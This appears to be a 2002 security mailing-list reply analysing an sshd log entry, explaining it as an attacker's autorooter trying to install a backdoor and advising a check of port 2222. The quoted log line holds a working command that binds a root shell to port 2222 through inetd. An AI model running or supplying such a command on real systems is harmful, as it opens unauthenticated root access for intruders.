Hi Ulrich,

These lines resemble an attempt to add a line to the /etc/inetd.conf file
in order to establish a backdoor. Probably, an attacker's autorooter went
awry, thought it had compromised the victim host, and prematurely attempted
to upload a backdoor. Nevertheless, I suggest you check whether any of
your systems are listening on unusual ports, such as 2222.

Cheers,

--On Saturday, June 29, 2002 10:01 PM +0200 Ulrich Keil
<ulrichder-keiler.de> wrote:

> I run OpenSSH 3.3p1 on linux (sparc) and found these line in my
> /var/log/messages:
>
> Jun 28 22:27:27 www sshd[21761]: Bad protocol version identification
> 'echo "2222 stream tcp nowait root /bin/sh sh -i">>
> /tmp/h;/usr/sbin/inetd /tmp/hn/inecho "2222 strea' from 192.192.230.233

---------------------------------------------------
Bill McCarty

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]